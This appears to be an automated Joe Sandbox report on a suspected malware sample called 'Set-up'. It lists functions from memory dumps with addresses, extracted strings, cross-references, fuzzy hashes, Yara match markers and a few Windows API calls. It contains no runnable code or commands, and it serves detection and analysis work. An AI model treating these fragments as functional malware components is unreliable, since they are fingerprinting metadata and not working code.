String ID: (!T!$2!0!$8!(!$8!?!$ndsd$pdvd${dd
API String ID: 0-1518220675
Opcode ID: 42f23c5576d8d63190fbf0bda66d7155ef1c9d263f9c3a0062ab18134afef183
Instruction ID: 9bfb39d0569567c4e36e917c7649c1d1e7a307a7d5a4d0a4bb41e5995000a84e
Opcode Fuzzy Hash: 42f23c5576d8d63190fbf0bda66d7155ef1c9d263f9c3a0062ab18134afef183
Instruction Fuzzy Hash: 6D71CB76A5C3109BC304CF16C84166FBAE2FFD5348F099C2DF5D88B221D635861A8B96

Function 01EFA037 Relevance: 8.9, Strings: 7, Instructions: 122COMMON

Download Yara Rule

Strings

bJSJ, xrefs: 01EFA197
tJdJ, xrefs: 01EFA0F0
wJbJ, xrefs: 01EFA0D0
rJnJ, xrefs: 01EFA0E8
cJwJ, xrefs: 01EFA0D8
J, xrefs: 01EFA0F8
,J^J, xrefs: 01EFA0E0

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: J$,J^J$bJSJ$cJwJ$rJnJ$tJdJ$wJbJ
API String ID: 0-492521606
Opcode ID: 4d3acfe89bc8585b86a75a3c39782e98ea8896ee447a22d9099341d6b753cdf1
Instruction ID: eaf95b35a3706a05a23cdb53d89bbc2d60e3c9b72433f99c2f13bb118abe103e
Opcode Fuzzy Hash: 4d3acfe89bc8585b86a75a3c39782e98ea8896ee447a22d9099341d6b753cdf1
Instruction Fuzzy Hash: E84180B19093028BD324DF54C4506ABB3F2FFC1394F16A52CEA894B394F7789654C746

Function 09178879 Relevance: 8.9, Strings: 7, Instructions: 122COMMON

Download Yara Rule

Strings

,J^J, xrefs: 09178922
cJwJ, xrefs: 0917891A
J, xrefs: 0917893A
wJbJ, xrefs: 09178912
bJSJ, xrefs: 091789D9
rJnJ, xrefs: 0917892A
tJdJ, xrefs: 09178932

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: J$,J^J$bJSJ$cJwJ$rJnJ$tJdJ$wJbJ
API String ID: 0-492521606
Opcode ID: 1398434f6a5f1e84bd1af24a8d0264dd195db4bde054dd56478cd97358f930aa
Instruction ID: 38c3e92f9cc45733c5d29622fbe430b630ec80d0c94137d547861ac64d987301
Opcode Fuzzy Hash: 1398434f6a5f1e84bd1af24a8d0264dd195db4bde054dd56478cd97358f930aa
Instruction Fuzzy Hash: 2D41AEB1A083028BD324DF14C4916ABF3F2FFC0358F15996CE9958B294F778A555CB8A

Function 01EDF249 Relevance: 7.8, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

6"", xrefs: 01EDF66F
D, xrefs: 01EDF533
"", xrefs: 01EDF64F
d"P", xrefs: 01EDF607
"", xrefs: 01EDF61F
p"F", xrefs: 01EDF5CF

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 6""$D$d"P"$p"F"$""$""
API String ID: 0-1382292853
Opcode ID: c79a6249d8727ec59d351b0555dc6db889339849d99805773d87658e6b6827be
Instruction ID: 5085ba3c501d83e5a3a14f08c3d78cdf650b87f4f6bdd13f0c82d33d676e8ce3
Opcode Fuzzy Hash: c79a6249d8727ec59d351b0555dc6db889339849d99805773d87658e6b6827be
Instruction Fuzzy Hash: A2B104B04083829BE728CF80CA9476BBBF1FF84748F105A8CE5951B290D7F68549DF86

Function 0915DA8B Relevance: 7.8, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

d"P", xrefs: 0915DE49
D, xrefs: 0915DD75
6"", xrefs: 0915DEB1
"", xrefs: 0915DE91
"", xrefs: 0915DE61
p"F", xrefs: 0915DE11

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: 6""$D$d"P"$p"F"$""$""
API String ID: 0-1382292853
Opcode ID: 39c89f1314c6ac00ffbc3d32a1d0e53895658a0a07b78df240fb0e47127f3d09
Instruction ID: 28bebb11bb7ba515d0826933f953b3e37f3e71821b8512cc5c7119797519fc7c
Opcode Fuzzy Hash: 39c89f1314c6ac00ffbc3d32a1d0e53895658a0a07b78df240fb0e47127f3d09
Instruction Fuzzy Hash: 03B1D0B05083829BE728CF81D69576BBBF1FF85748F104A8CE5A51B290D3F58548DF86

Function 01EF6F2E Relevance: 7.7, Strings: 6, Instructions: 226COMMON

Download Yara Rule

Strings

}2q2, xrefs: 01EF7141
m2?2, xrefs: 01EF7169
o2x2, xrefs: 01EF7151
u202, xrefs: 01EF7149
M2x2, xrefs: 01EF7171
c2o2, xrefs: 01EF7179

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: M2x2$c2o2$m2?2$o2x2$u202$}2q2
API String ID: 0-1290146539
Opcode ID: f38e1199e481c1a9992ff0379b5f7aa6b3030943ecfae1711c30923de6d3298a
Instruction ID: 3bd50207bbbf65ce012990654b8afe22ef1146b378de75cd82bcc86ce96c0777
Opcode Fuzzy Hash: f38e1199e481c1a9992ff0379b5f7aa6b3030943ecfae1711c30923de6d3298a
Instruction Fuzzy Hash: F6613EB28093508BD724DF18CD8066BB7F1FFC5318F08996DE9855B395E7B58A04CB8A

Function 09175770 Relevance: 7.7, Strings: 6, Instructions: 226COMMON

Download Yara Rule

Strings

o2x2, xrefs: 09175993
M2x2, xrefs: 091759B3
c2o2, xrefs: 091759BB
m2?2, xrefs: 091759AB
}2q2, xrefs: 09175983
u202, xrefs: 0917598B

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: M2x2$c2o2$m2?2$o2x2$u202$}2q2
API String ID: 0-1290146539
Opcode ID: 9de3aaf11f0e2ee482b38c0393ecb77c9407e30e746739f3fde1d6b151a35207
Instruction ID: b13e303ace6e916dd66d302a403044c915529108eac72e4de9d84d27134eac94
Opcode Fuzzy Hash: 9de3aaf11f0e2ee482b38c0393ecb77c9407e30e746739f3fde1d6b151a35207
Instruction Fuzzy Hash: E06100B1A083519BD724DF19C98166BB7F2FFC5328F08892DF8855B394E7758904CB86

Function 01EF814E Relevance: 7.6, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

%M)M, xrefs: 01EF8956
)M-M, xrefs: 01EF88E8
MM, xrefs: 01EF88CA
-M M, xrefs: 01EF8982
4M:M, xrefs: 01EF896C
>M5M, xrefs: 01EF894B

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: %M)M$)M-M$-M M$4M:M$>M5M$MM
API String ID: 0-1618744259
Opcode ID: 6bb92850b2d7d3641eec0a61aca66db7b9ec77351d41e738220d4935adcea50a
Instruction ID: 1c9e5ee6c55ed524f223e44363f1dac7190b5d1610e4ca22ddb1962663535a2e
Opcode Fuzzy Hash: 6bb92850b2d7d3641eec0a61aca66db7b9ec77351d41e738220d4935adcea50a
Instruction Fuzzy Hash: BA3179B061D7808AD7349F24D841BAFBAF5FB82344F46991CE4C9AB214D7368041CF1B

Function 09176990 Relevance: 7.6, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

MM, xrefs: 0917710C
>M5M, xrefs: 0917718D
)M-M, xrefs: 0917712A
%M)M, xrefs: 09177198
-M M, xrefs: 091771C4
4M:M, xrefs: 091771AE

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: %M)M$)M-M$-M M$4M:M$>M5M$MM
API String ID: 0-1618744259
Opcode ID: 8f597e597aea1babd0670621b08bd39698a6e79f616f6cea14f556e6302fc282
Instruction ID: cd64a8817d5e95bf972bdfbdd652dd8655c6b567c600e95973c3c164c3870ebd
Opcode Fuzzy Hash: 8f597e597aea1babd0670621b08bd39698a6e79f616f6cea14f556e6302fc282
Instruction Fuzzy Hash: DA3179B061D7848AD7349F24D841BABBAB5FB82348F56991CE4C9AB214D7368081CF1B

Function 01EE0CE7 Relevance: 7.1, Strings: 5, Instructions: 860COMMON

Download Yara Rule

Strings

EN, xrefs: 01EE1140
+, xrefs: 01EE15D4
Vr, xrefs: 01EE0D49
L, xrefs: 01EE1455
", xrefs: 01EE1069

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: "$+$EN$L$Vr
API String ID: 0-3667360776
Opcode ID: 9a71aeee5feb5ea98c9d15c0ef6c878490df6ebf63bd4bb717a560cf6d761d55
Instruction ID: c6f334ec01cfcf27f6d1c89a7178f1192d6115e887eaa625cc3b0a56a9353ca1
Opcode Fuzzy Hash: 9a71aeee5feb5ea98c9d15c0ef6c878490df6ebf63bd4bb717a560cf6d761d55
Instruction Fuzzy Hash: 317282766087818BD328DF38C4553AEBBE1AF99320F055A2EE5A9C73D0D7798981C743

Function 0915F529 Relevance: 7.1, Strings: 5, Instructions: 860COMMON

Download Yara Rule

Strings

", xrefs: 0915F8AB
L, xrefs: 0915FC97
Vr, xrefs: 0915F58B
+, xrefs: 0915FE16
EN, xrefs: 0915F982

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: "$+$EN$L$Vr
API String ID: 0-3667360776
Opcode ID: 7c71bbb37e1bf6a49cb784e01d18aa3b8e1d554a9f942a2279fdb96056e19e8e
Instruction ID: 4264fd8746448d2a98bc04da5495df3f7039152f2b70bf6c4d7184e7a6e2c9c4
Opcode Fuzzy Hash: 7c71bbb37e1bf6a49cb784e01d18aa3b8e1d554a9f942a2279fdb96056e19e8e
Instruction Fuzzy Hash: D6728376A0C7408BD3289F38C5553AFB7E1AF85354F068A2EE9AAC73D0D77989418743

Function 01EE1A05 Relevance: 7.0, Strings: 5, Instructions: 700COMMON

Download Yara Rule

Strings

<., xrefs: 01EE204C
f@, xrefs: 01EE21A2
$, xrefs: 01EE2143
i, xrefs: 01EE21AC
X@, xrefs: 01EE20D4

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: $$<.$X@$f@$i
API String ID: 0-92190101
Opcode ID: 76057aca78ef6258cb3f0f36a2a9c21cc4cc31b390b94c749221e06c0b8c2956
Instruction ID: 1d5288ccf801b78d02b4f8ded66d886e59d9cae6740b75bf7ea3e9bffa5d416b
Opcode Fuzzy Hash: 76057aca78ef6258cb3f0f36a2a9c21cc4cc31b390b94c749221e06c0b8c2956
Instruction Fuzzy Hash: 5C5282766087918BC3649F38C4843AEBBE1AF99320F159A2DE9E9C73D1D7358941CB43

Function 01F094AE Relevance: 6.8, Strings: 5, Instructions: 574COMMON

Download Yara Rule

Strings

C, xrefs: 01F0957D
,,Y,, xrefs: 01F096A5
[d, xrefs: 01F0953A
W;, xrefs: 01F094F5
\, xrefs: 01F09588

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: ,,Y,$C$W;$[d$\
API String ID: 0-2867424240
Opcode ID: 9f5a3a55b9afe0a89d9fc505072badb18eaa323c1cf13941a043a56f956f5005
Instruction ID: 2a099b03da26534fbb2a76bf1628f2c7711797abb3b381e6ffd1f325e8e0d269
Opcode Fuzzy Hash: 9f5a3a55b9afe0a89d9fc505072badb18eaa323c1cf13941a043a56f956f5005
Instruction Fuzzy Hash: 0702CB76A083019BE710DF69C880B6BBBE5FFC5714F14882DE5999B2A1E7B5D801CB42

Function 09169930 Relevance: 6.8, APIs: 2, Strings: 1, Instructions: 1513COMMON

Download Yara Rule

APIs

Part of subcall function 0918CD20: LdrInitializeThunk.NTDLL(0919009B,76E87000,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0918CD4E

FreeLibrary.KERNEL32(?), ref: 0916A030
FreeLibrary.KERNEL32(?), ref: 0916A0CE

Strings

Fn@n, xrefs: 09169D65

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: Fn@n
API String ID: 764372645-2265005453
Opcode ID: bc86307b0cc51ced08faf6be7043f4ac754c1864845e0126e2e1f5ebe2a36c0d
Instruction ID: 978ef9c20abe7b04ece50b75a7f6278bc7f8745b806436465c100258787cba4f
Opcode Fuzzy Hash: bc86307b0cc51ced08faf6be7043f4ac754c1864845e0126e2e1f5ebe2a36c0d
Instruction Fuzzy Hash: 44A20376B083149FD721DE24C88076BB7E2BFC4308F19882CE9D597361D776A9648B82

Function 01EDB42D Relevance: 6.4, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

%X:X, xrefs: 01EDB55A
)XPX, xrefs: 01EDB550
7XvX, xrefs: 01EDB564
IX6X, xrefs: 01EDB56E
&XSX, xrefs: 01EDB546

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: %X:X$&XSX$)XPX$7XvX$IX6X
API String ID: 0-642955395
Opcode ID: 42efe6a36395c178b10bc893f22e1426d2528c6eb6f76131c1adee47900fcec9
Instruction ID: df397a305db9b29b604bf1279e9d0d88e7b5dc7c27db206dae1f8aa006ab411a
Opcode Fuzzy Hash: 42efe6a36395c178b10bc893f22e1426d2528c6eb6f76131c1adee47900fcec9
Instruction Fuzzy Hash: 47417C77E107168BE754CFA5CC847DABB7AEF92B00F1581AC8518E7640EB749652CF40

Function 01EF2D2E Relevance: 5.6, Strings: 4, Instructions: 586COMMON

Download Yara Rule

Strings

H, xrefs: 01EF3017
H, xrefs: 01EF3021
,, xrefs: 01EF331E
!@, xrefs: 01EF2D61

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,$H$H
API String ID: 0-4170808191
Opcode ID: 07a41929d58c038910b4883344931460a371bacd5174635f6997d3fb7463155f
Instruction ID: 1875a130af35d5ebcb1c89ee7ec52e86a534d9d0b9dc88a92de141569b74316f
Opcode Fuzzy Hash: 07a41929d58c038910b4883344931460a371bacd5174635f6997d3fb7463155f
Instruction Fuzzy Hash: 5932BF7560C3418BD3289F28C4913AFBBE2BFC9314F19992DEA9987391D7798845CB42

Function 01EE2E5E Relevance: 4.9, Strings: 2, Instructions: 2356COMMON

Download Yara Rule

Strings

&8, xrefs: 01EE3181
`, xrefs: 01EE3D7A

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: &8$`
API String ID: 0-842996520
Opcode ID: 3ff6ec6a9b9cf5832afdf5d599e7f3729040dbc2b936a533fb27237fdf7d523b
Instruction ID: a797ecbed0d28fcb3372820fda14fe2316bf3d242cec3796ab2cbeea59afec69
Opcode Fuzzy Hash: 3ff6ec6a9b9cf5832afdf5d599e7f3729040dbc2b936a533fb27237fdf7d523b
Instruction Fuzzy Hash: BD13E0B6D042148BDB14DF78C8853AEBBF1BF49310F0596A9D85AEB391E7358D41CB82

Function 0915EB3B Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 661COMMON

Download Yara Rule

Strings

m, xrefs: 0915EB49

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: m
API String ID: 0-53672527
Opcode ID: 8528a5fd2667fa500574841422f999a60d05fe3740711eefb067de78c270189f
Instruction ID: 5e9081caa2d870aa8ab578078c0603c684490f5089f9fbbf70c2ba0a4d84bb23
Opcode Fuzzy Hash: 8528a5fd2667fa500574841422f999a60d05fe3740711eefb067de78c270189f
Instruction Fuzzy Hash: F4428275A1D7508BD329DF78C8513AFB7E1AF84354F068A2EE8EAC7390D77489418B42

Function 01EF7CDE Relevance: 4.1, Strings: 3, Instructions: 380COMMON

Download Yara Rule

Strings

X`X*, xrefs: 01EF80D9
l'Y9, xrefs: 01EF80D1
{$[7, xrefs: 01EF80F4

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: X`X*$l'Y9${$[7
API String ID: 0-1509796914
Opcode ID: 4d1a071dd5a51163a6e43cfc407dd2c3b5ea858498c259f9a98105892868a14e
Instruction ID: 8af6da966263b86edb91e979d1f6b0fa5d7cedb800749d2778abed8486a894be
Opcode Fuzzy Hash: 4d1a071dd5a51163a6e43cfc407dd2c3b5ea858498c259f9a98105892868a14e
Instruction Fuzzy Hash: 7BB13872E083115BEB24CF58C8416AFB7A2EF95304F56A52CEE899B391D332ED458391

Function 01EDAD2E Relevance: 4.1, Strings: 3, Instructions: 366COMMON

Download Yara Rule

Strings

bC, xrefs: 01EDB161
mX, xrefs: 01EDADA1
pid, xrefs: 01EDADE6

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: bC$mX$pid
API String ID: 0-825546773
Opcode ID: 49f1ae9cf1187bed11a64702f0a534ae933f969ad53776653a448421e2cb6978
Instruction ID: a082780a9a40a218d7a0371ca92f747404d6701c6f590e2f0799fd93bfa03729
Opcode Fuzzy Hash: 49f1ae9cf1187bed11a64702f0a534ae933f969ad53776653a448421e2cb6978
Instruction Fuzzy Hash: ADC123B2A083118BD328CF24C8516AFBBE5FFC4304F15592DE5AADB260E735D549CB86

Function 09159570 Relevance: 4.1, Strings: 3, Instructions: 366COMMON

Download Yara Rule

Strings

mX, xrefs: 091595E3
bC, xrefs: 091599A3
pid, xrefs: 09159628

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: bC$mX$pid
API String ID: 0-825546773
Opcode ID: c01b5791ee5d9fbf608226703241c4c64989685de207da1bb206bd87aedf3de8
Instruction ID: 22a89d9bbbd1160dced169b00b97c6ab807e4d6d0f46e091a99d44e7b8f13f98
Opcode Fuzzy Hash: c01b5791ee5d9fbf608226703241c4c64989685de207da1bb206bd87aedf3de8
Instruction Fuzzy Hash: 7DC1F2B1A18311CBD328CF24C8516AFBBE5FF84304F15592DE9AADB260E735D508CB96

Function 01EDC06E Relevance: 4.1, Strings: 3, Instructions: 349COMMON

Download Yara Rule

Strings

F>]>, xrefs: 01EDC13D
j>a>, xrefs: 01EDC1CD
ok, xrefs: 01EDC281

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: F>]>$j>a>$ok
API String ID: 0-2883800044
Opcode ID: 4e92e947c669020acb45c569a1a1553fc077076f9e7ef8d8f2e7ef84482c917a
Instruction ID: 43a89121d9dd604d29ab2c4326974dd2c794a1635995e3b37d851fe8aa24fe28
Opcode Fuzzy Hash: 4e92e947c669020acb45c569a1a1553fc077076f9e7ef8d8f2e7ef84482c917a
Instruction Fuzzy Hash: 56B1F2B250C3118BD328CF58C45016FBBF2EFD5748F25586CEAD59B340D6399A0ACB9A

Function 01ED9A7E Relevance: 4.0, Strings: 3, Instructions: 271COMMON

Download Yara Rule

Strings

P"D, xrefs: 01ED9D04
., xrefs: 01ED9AD7
${*{, xrefs: 01ED9B79

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: ${*{$.$P"D
API String ID: 0-640708526
Opcode ID: b7637f650ca3e41c53f0ed85980e61778829ecfea06bfdabb1f92a68bb9f1c63
Instruction ID: 53ec169234cb85749a8de90be18e34471429e2854f058605e1b6a2fdcf2637b8
Opcode Fuzzy Hash: b7637f650ca3e41c53f0ed85980e61778829ecfea06bfdabb1f92a68bb9f1c63
Instruction Fuzzy Hash: 72814E32F083524BC7148E2CCCC029EBBE2ABC532CF5A9A65D8955B3A6D274CC4787C5

Function 09160C83 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 09160E57

Strings

zI, xrefs: 09161121

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: zI
API String ID: 237503144-2601089719
Opcode ID: f07ce5db154e29ac554d0c3b08543d17ed5fb02238cbd796ae2cfd518cb7d870
Instruction ID: d3b8ddcd3a7db0ef9d5fd5bb935c712877124199beedd5ed606c19d23d1f5381
Opcode Fuzzy Hash: f07ce5db154e29ac554d0c3b08543d17ed5fb02238cbd796ae2cfd518cb7d870
Instruction Fuzzy Hash: C9129271B1D7509BD768AF38C5913AFB7E1AF84364F168A2EE8EA873D0D73484408742

Function 01ED639E Relevance: 3.3, Strings: 2, Instructions: 833COMMON

Download Yara Rule

Strings

8, xrefs: 01ED6CD4
0, xrefs: 01ED6CDC

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 2ddd98d90996f6ff769892f79818dbd2de7a54bca0126600855e5b3538ddbadc
Instruction ID: 98d26d59612694d2d6a29c404488862827aea3785b61afd662a2f5afcb08d199
Opcode Fuzzy Hash: 2ddd98d90996f6ff769892f79818dbd2de7a54bca0126600855e5b3538ddbadc
Instruction Fuzzy Hash: FA7257716083409FD725CF18C880B9FBBE1AF88318F08992DF9998B391D375D959CB92

Function 09154BE0 Relevance: 3.3, Strings: 2, Instructions: 833COMMON

Download Yara Rule

Strings

0, xrefs: 0915551E
8, xrefs: 09155516

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 89f2e0da6ba26e0470e2afa4560d186a078849a96ff410a8392c8a08b831c501
Instruction ID: d1e6304346df33a817e546b13fa3da644ed19f8fca5dffc803374de388da4deb
Opcode Fuzzy Hash: 89f2e0da6ba26e0470e2afa4560d186a078849a96ff410a8392c8a08b831c501
Instruction Fuzzy Hash: B9724871608340DFD714CF18C890B9BBBE2AF84358F45891DF9AA8B3A1D375D958CB92

Function 01EDA8BE Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

^~dx, xrefs: 01EDA9BC
@, xrefs: 01EDAA24

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: @$^~dx
API String ID: 0-212991012
Opcode ID: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction ID: cdc65d954797106d0189562b12d0ca92788202ab5bd37c52e2a0e50a80371cfe
Opcode Fuzzy Hash: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction Fuzzy Hash: 05C1047164C3918AD726CF79C4407ABBBE1AFC6304F0858ADE4D5DB286D339C60AC766

Function 09159100 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

@, xrefs: 09159266
^~dx, xrefs: 091591FE

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: @$^~dx
API String ID: 0-212991012
Opcode ID: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction ID: 235563146d650192dbc8c12a991f0e517749aa07d477d293c39bc67ef589fc32
Opcode Fuzzy Hash: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction Fuzzy Hash: 47C1F17160C391CAD725CF79C4903ABBBE1AF86304F4958ADE8D6DB282D339C505C7A6

Function 01ED5A5E Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 01ED5AD9
IEND, xrefs: 01ED5E4F

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: cc6d70053be118b360131ef44f2de66a3c217fc8f7de176e2503fc4567789736
Instruction ID: 0479af6040fd09945ad1d649cc03c935179cdbc48f2432793b54edca63f31777
Opcode Fuzzy Hash: cc6d70053be118b360131ef44f2de66a3c217fc8f7de176e2503fc4567789736
Instruction Fuzzy Hash: BAD1ACB19083459FE720CF18CC44B9EBBE4AF94308F14992DF9999B381D775D90ACB92

Function 091542A0 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 0915431B
IEND, xrefs: 09154691

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: da306f9a7a54bc906f74d54edb6fdc0916d5c3c283789363a6f320751acbc1a4
Instruction ID: dbde6f879a08f330518878bf3782324943425d7a9861f49d10b58d6219d82ee1
Opcode Fuzzy Hash: da306f9a7a54bc906f74d54edb6fdc0916d5c3c283789363a6f320751acbc1a4
Instruction Fuzzy Hash: 0ED19EB1A08344DFE710CF14D84175ABBE4AB94308F06891DFDAA9B391D375E948CB92

Function 01EE7230 Relevance: 2.8, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

7, xrefs: 01EE7388
gfff, xrefs: 01EE73E5

